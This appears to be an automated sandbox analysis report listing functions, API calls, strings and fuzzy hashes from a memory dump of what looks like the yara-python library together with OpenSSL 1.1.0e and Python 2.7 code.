PyObject_IsTrue.PYTHON27(?), ref: 02DA1580
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02DA15AD
PyString_AsString.PYTHON27(?), ref: 02DA15CF
PyDict_Next.PYTHON27(?,?,?,?), ref: 02DA1636
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02DA165E

Strings

external values must be of type integer, float, boolean or string, xrefs: 02DA1658

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: 27ca7a8380de930e8da9b18895ab151af23b90edc0d7e8cccae159c77f238987
Instruction ID: efb3ab086c6a688d8405afa8256bbf97618c31c757d5c517598c199af924f7b6
Opcode Fuzzy Hash: 27ca7a8380de930e8da9b18895ab151af23b90edc0d7e8cccae159c77f238987
Instruction Fuzzy Hash: F04119B19802046BD710EB5DAC5CE6B77ACEB85654F8C485AFC5AC3201E731DC14CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02DA13C0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02DA13E7
PyString_AsString.PYTHON27(?,?), ref: 02DA140B
PyObject_IsTrue.PYTHON27(?), ref: 02DA1422
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02DA1450
PyString_AsString.PYTHON27(?), ref: 02DA146E
PyDict_Next.PYTHON27(?,?,?,?), ref: 02DA14CC
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02DA14F3

Strings

external values must be of type integer, float, boolean or string, xrefs: 02DA14ED

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: 9b088c5171a07084259bd38b139e5186a2351a97ca20f03dafcaeacef161de1a
Instruction ID: ef27f50e858e1f675d763ba500c86a01145fdaf1600ff2ee6af55a491ba488ca
Opcode Fuzzy Hash: 9b088c5171a07084259bd38b139e5186a2351a97ca20f03dafcaeacef161de1a
Instruction Fuzzy Hash: 3831F6B2984200ABD710EB6EEC5CE6B77ACEB84654F48895AF849C3301E631DD10CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 02E182D0, Relevance: 16.7, APIs: 11, Instructions: 155fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02DF9F33,?,00000001,00000000,?), ref: 02E18326
GetLastError.KERNEL32(?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?,02E8B7D4,?,02E0FCF2,?,00000002,?), ref: 02E1832E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?), ref: 02E18352
GetLastError.KERNEL32(?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?,02E8B7D4,?,02E0FCF2,?,00000002,?), ref: 02E1835A
fopen.MSVCR90 ref: 02E18373
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?), ref: 02E183AC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000001,00000008,?,00000000,?,02DF9F33,?,00000001,00000000,?), ref: 02E183D9
_wfopen.MSVCR90 ref: 02E183E7
_errno.MSVCR90 ref: 02E183F5
_errno.MSVCR90 ref: 02E183FF
fopen.MSVCR90 ref: 02E1840B

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopen$_wfopen
String ID:
API String ID: 1544496049-0
Opcode ID: 50da70e465f761bf524d6b7cbf24aa78fd58119c26a25e8a1dd07d6e88030b0b
Instruction ID: 4ffd7047c228e731c5866ecad7e4d51e184560c0b0376cfaabf0f1a894ae1d48
Opcode Fuzzy Hash: 50da70e465f761bf524d6b7cbf24aa78fd58119c26a25e8a1dd07d6e88030b0b
Instruction Fuzzy Hash: 2E41F931E801059BDB20DBA5DC5ABFEB7B9EF45344F44517AF905AB280DB309D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E60DD0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCR90 ref: 02E60DE3
isspace.MSVCR90 ref: 02E60E11
isspace.MSVCR90 ref: 02E60E26
isspace.MSVCR90 ref: 02E60E55
isspace.MSVCR90 ref: 02E60E67
isspace.MSVCR90 ref: 02E60E79
isspace.MSVCR90 ref: 02E60E93
memcpy.MSVCR90 ref: 02E60EC4

Strings

..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c, xrefs: 02E60EA9

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$memcpystrrchr
String ID: ..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c
API String ID: 3868098041-994196654
Opcode ID: 6449b1881adb35af8e10775c42bc27f728551013cacf2757313ede486eb62d91
Instruction ID: fa2fe9fb6083f7a4cc5b54f5f24cc3681bd821c00e3ee7249fa347f99ed4562e
Opcode Fuzzy Hash: 6449b1881adb35af8e10775c42bc27f728551013cacf2757313ede486eb62d91
Instruction Fuzzy Hash: 65314BA2DC437117EB216BB19C487777A89DB912DDF08943DFC868A202FF26D50586E2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA17A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON27(?,02EB5188), ref: 02DA17B9
PyErr_Format.PYTHON27(?,'Match' objects must be compared with objects of the same class), ref: 02DA17D3
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02DA180A
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02DA181D

Strings

'Match' objects must be compared with objects of the same class, xrefs: 02DA17CD

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: BoolCompareObject_Rich$Err_FormatSubtypeType_
String ID: 'Match' objects must be compared with objects of the same class
API String ID: 966302056-74632398
Opcode ID: 3efda70fa3ae4d7372ff15fb64322a69fa52f3ed1b395e2bb5d660294f578d23
Instruction ID: 13efb95b8f2b2e86edde19d3ee615602237574d14e7774a3a586e88263cfed1f
Opcode Fuzzy Hash: 3efda70fa3ae4d7372ff15fb64322a69fa52f3ed1b395e2bb5d660294f578d23
Instruction Fuzzy Hash: 62318576780301ABD610CB66EC89E17B3A9FBC47A1F588866ED5883340D334EC65C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9630, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 02DE9658
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 02DE9668
GetProcessWindowStation.USER32 ref: 02DE968C
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 02DE96A7
GetLastError.KERNEL32 ref: 02DE96B5
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 02DE96EA
wcsstr.MSVCR90 ref: 02DE970C

Strings

Service-0x, xrefs: 02DE9702
_OPENSSL_isservice, xrefs: 02DE9662

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 459917433-1672312481
Opcode ID: 2e5d13564e44ac50c076f5a2a3fe156da3026579c65859b4e6ed4a5402f3b692
Instruction ID: 02432e207bbcdda173c12678692f45d7b503587e61dbf32db694c03abf6b0855
Opcode Fuzzy Hash: 2e5d13564e44ac50c076f5a2a3fe156da3026579c65859b4e6ed4a5402f3b692
Instruction Fuzzy Hash: 31310B71AC0205ABDB10EFB5DC59BAF77A4EB45350F905A26F816E22C0DB30A955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02DF9F20, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02E182D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02DF9F33,?,00000001,00000000,?), ref: 02E18326
Part of subcall function 02E182D0: GetLastError.KERNEL32(?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?,02E8B7D4,?,02E0FCF2,?,00000002,?), ref: 02E1832E
Part of subcall function 02E182D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?), ref: 02E18352
Part of subcall function 02E182D0: GetLastError.KERNEL32(?,02DF9F33,?,00000001,00000000,?,?,?,02E0FC93,?,02E8B7D4,?,02E0FCF2,?,00000002,?), ref: 02E1835A
Part of subcall function 02E182D0: fopen.MSVCR90 ref: 02E18373

strchr.MSVCR90 ref: 02DF9F3D
GetLastError.KERNEL32(..\..\openssl-1.1.0e\crypto\bio\bss_file.c,0000004A), ref: 02DF9F5B
_errno.MSVCR90 ref: 02DF9F86
_errno.MSVCR90 ref: 02DF9F90

Strings

..\..\openssl-1.1.0e\crypto\bio\bss_file.c, xrefs: 02DF9F56, 02DF9F9C, 02DF9FB8
fopen(', xrefs: 02DF9F77
',', xrefs: 02DF9F71

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ByteCharMultiWide_errno$fopenstrchr
String ID: ','$..\..\openssl-1.1.0e\crypto\bio\bss_file.c$fopen('
API String ID: 67969700-1337701112
Opcode ID: e980faf7972ea3e403b01b271f677e530940b089b6a01b5c5078cf22c7afdce3
Instruction ID: 9af786d41a3cc0897c2a81cdcd276442a281a05efd901659f4a613af256264c1
Opcode Fuzzy Hash: e980faf7972ea3e403b01b271f677e530940b089b6a01b5c5078cf22c7afdce3
Instruction Fuzzy Hash: F921D472FC071036F13035A96C4BFAB774ACF41BA6F029166F70AF92C2E692485085B6

Uniqueness

Uniqueness Score: -1.00%

Function 02DADEE0, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 448COMMON

Download Yara Rule

Strings

wrong type "integer" for | operator, xrefs: 02DADFA8
wrong type "boolean" for | operator, xrefs: 02DADF67
wrong type "boolean" for | operator, xrefs: 02DAE001
wrong type "string" for | operator, xrefs: 02DADFE2
wrong type "float" for | operator, xrefs: 02DADFBD
wrong type "string" for | operator, xrefs: 02DADF52
wrong type "integer" for | operator, xrefs: 02DADF0E
wrong type "float" for | operator, xrefs: 02DADF33

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for | operator$wrong type "boolean" for | operator$wrong type "float" for | operator$wrong type "float" for | operator$wrong type "integer" for | operator$wrong type "integer" for | operator$wrong type "string" for | operator$wrong type "string" for | operator
API String ID: 0-2742613685
Opcode ID: dc7dd4cc7e4a6bf4b396b8625860c2e11ac6ef70817ae9e88f95a05e035d4efd
Instruction ID: 16b986888a310d0efa3e04248a5aa8c47c60c7beccb12a91a5a92943b99bddb8
Opcode Fuzzy Hash: dc7dd4cc7e4a6bf4b396b8625860c2e11ac6ef70817ae9e88f95a05e035d4efd
Instruction Fuzzy Hash: 81128CB09083419FD314CF18C494EAAB7E5FF88304F548A2EE58A8B391E774D955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DADD4E, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 448COMMON

Download Yara Rule

Strings

wrong type "float" for ^ operator, xrefs: 02DADE2B
wrong type "float" for ^ operator, xrefs: 02DADDA1
wrong type "boolean" for ^ operator, xrefs: 02DADDD5
wrong type "string" for ^ operator, xrefs: 02DADDC0
wrong type "string" for ^ operator, xrefs: 02DADE50
wrong type "integer" for ^ operator, xrefs: 02DADE16
wrong type "integer" for ^ operator, xrefs: 02DADD7C
wrong type "boolean" for ^ operator, xrefs: 02DADE6F

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for ^ operator$wrong type "boolean" for ^ operator$wrong type "float" for ^ operator$wrong type "float" for ^ operator$wrong type "integer" for ^ operator$wrong type "integer" for ^ operator$wrong type "string" for ^ operator$wrong type "string" for ^ operator
API String ID: 0-842975192
Opcode ID: 41be08e9757f00b2e64b210fbd24020eb1b5601c26ced7b207f08bd8430c16b7
Instruction ID: b5e0053e46856cad47822030f2f51523fe4f7714a99fdc79a4f500ea95ab4307
Opcode Fuzzy Hash: 41be08e9757f00b2e64b210fbd24020eb1b5601c26ced7b207f08bd8430c16b7
Instruction Fuzzy Hash: 24128CB09083419FD314CF18D4A4EAAB7E5FF88704F14892EE5898B391E774DD55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DABD83, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 437COMMON

Download Yara Rule

Strings

wrong type "string" for matches operator, xrefs: 02DABDE2
wrong type "string" for matches operator, xrefs: 02DABE7B
wrong type "float" for matches operator, xrefs: 02DABDBD
wrong type "integer" for matches operator, xrefs: 02DABE44
wrong type "boolean" for matches operator, xrefs: 02DABE01
wrong type "integer" for matches operator, xrefs: 02DABDAB
wrong type "boolean" for matches operator, xrefs: 02DABE9A
wrong type "float" for matches operator, xrefs: 02DABE56

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for matches operator$wrong type "boolean" for matches operator$wrong type "float" for matches operator$wrong type "float" for matches operator$wrong type "integer" for matches operator$wrong type "integer" for matches operator$wrong type "string" for matches operator$wrong type "string" for matches operator
API String ID: 0-1871212892
Opcode ID: 197ee897866ed82c652beef86f45799e007a3eeb33065c450fe56a31e2d10bce
Instruction ID: 3340b7286dd337c864cfce5eb73671e1ec0338bbc9a325ea175bbfad8bb1ab8e
Opcode Fuzzy Hash: 197ee897866ed82c652beef86f45799e007a3eeb33065c450fe56a31e2d10bce
Instruction Fuzzy Hash: 5D027CB09083019FD314CF18D4A4EAAB7F5FF88704F54892EE5898B392E774D955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DABEED, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 434COMMON

Download Yara Rule

Strings

wrong type "string" for contains operator, xrefs: 02DABFEC
wrong type "boolean" for contains operator, xrefs: 02DABF6B
wrong type "float" for contains operator, xrefs: 02DABFC7
wrong type "float" for contains operator, xrefs: 02DABF27
wrong type "string" for contains operator, xrefs: 02DABF4C
wrong type "boolean" for contains operator, xrefs: 02DAC00B
wrong type "integer" for contains operator, xrefs: 02DABFB2
wrong type "integer" for contains operator, xrefs: 02DABF15

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for contains operator$wrong type "boolean" for contains operator$wrong type "float" for contains operator$wrong type "float" for contains operator$wrong type "integer" for contains operator$wrong type "integer" for contains operator$wrong type "string" for contains operator$wrong type "string" for contains operator
API String ID: 0-4220623751
Opcode ID: eed503263cdc7c7959b228429b3c1449d23d53c8e11bf6c879fc2742a7e2b9e0
Instruction ID: fda4febd63f8258fc08c5bf7045832d022773e776a078a8a7c84d6ed89c02e5b
Opcode Fuzzy Hash: eed503263cdc7c7959b228429b3c1449d23d53c8e11bf6c879fc2742a7e2b9e0
Instruction Fuzzy Hash: 2A028DB09083019FD314CF18D494EAAB7E5FF88704F54892EE58A8B392E774DD55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02DA6620, Relevance: 13.6, APIs: 9, Instructions: 87fileCOMMON

Download Yara Rule

APIs

fopen.MSVCR90 ref: 02DA662B
fseek.MSVCR90 ref: 02DA664C
ftell.MSVCR90 ref: 02DA664F
fseek.MSVCR90 ref: 02DA665C
fclose.MSVCR90 ref: 02DA6667

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: fseek$fclosefopenftell
String ID:
API String ID: 821468074-0
Opcode ID: 57e673b2bb05bf011269102dcf76962dbfb59153a6825bcd76ae8f89aa6a79f6
Instruction ID: 6cbfb6df2a9a61fbd5d9a462ec278cbdebc087648be6b221bdbe03c91da11ee8
Opcode Fuzzy Hash: 57e673b2bb05bf011269102dcf76962dbfb59153a6825bcd76ae8f89aa6a79f6
Instruction Fuzzy Hash: 9B216B72A81500ABD61077ADBC8CFCB775CDF84B60F580562FD0982241E335EC59C5B1

Uniqueness

Uniqueness Score: -1.00%

Function 02DA61A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02DA61E3
printf.MSVCR90 ref: 02DA61ED
printf.MSVCR90 ref: 02DA6215
printf.MSVCR90 ref: 02DA6221

Strings

%02X, xrefs: 02DA6246
AND, xrefs: 02DA61D7

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533953798.0000000002EC7000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02X$AND
API String ID: 3524737521-2084899897
Opcode ID: 96d861ee8fadb25252adbad8e6c04416a5e67ffe0eee78efc2ad13576642a112
Instruction ID: 7bbc6d9046441afbfd194176845d22aa2ca97682e808ffe6516862d46858cebe
Opcode Fuzzy Hash: 96d861ee8fadb25252adbad8e6c04416a5e67ffe0eee78efc2ad13576642a112
Instruction Fuzzy Hash: 36112732DC451096EA1256996826FE7FB6E9FC1B08F5CC116D89E02303E221E8A1C6E3

Uniqueness

Uniqueness Score: -1.00%

Function 02DB54E0, Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 330COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02DB5676

Part of subcall function 02DB52B0: memset.MSVCR90 ref: 02DB5382
Part of subcall function 02DB52B0: memset.MSVCR90 ref: 02DB5397

Strings

%s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N, xrefs: 02DB5704
regular expression, xrefs: 02DB5651, 02DB5663
greedy and ungreedy quantifiers can't be mixed in a regular expression, xrefs: 02DB56C0
%s in rule %s is slowing down scanning, xrefs: 02DB58DF
hex string, xrefs: 02DB5648
invalid %s "%s": %s, xrefs: 02DB5664

Memory Dump Source

Source File: 00000008.00000002.531564575.0000000002DA1000.00000020.00020000.sdmp, Offset: 02DA0000, based on PE: true

Associated: 00000008.00000002.531529419.0000000002DA0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533324428.0000000002E6C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.533534090.0000000002EB5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533551163.0000000002EB6000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533604759.0000000002EB8000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533652693.0000000002EB9000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.533769282.0000000002EBF000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.533864949.0000000002EC6000.00000004.00020000.sdmp Download File
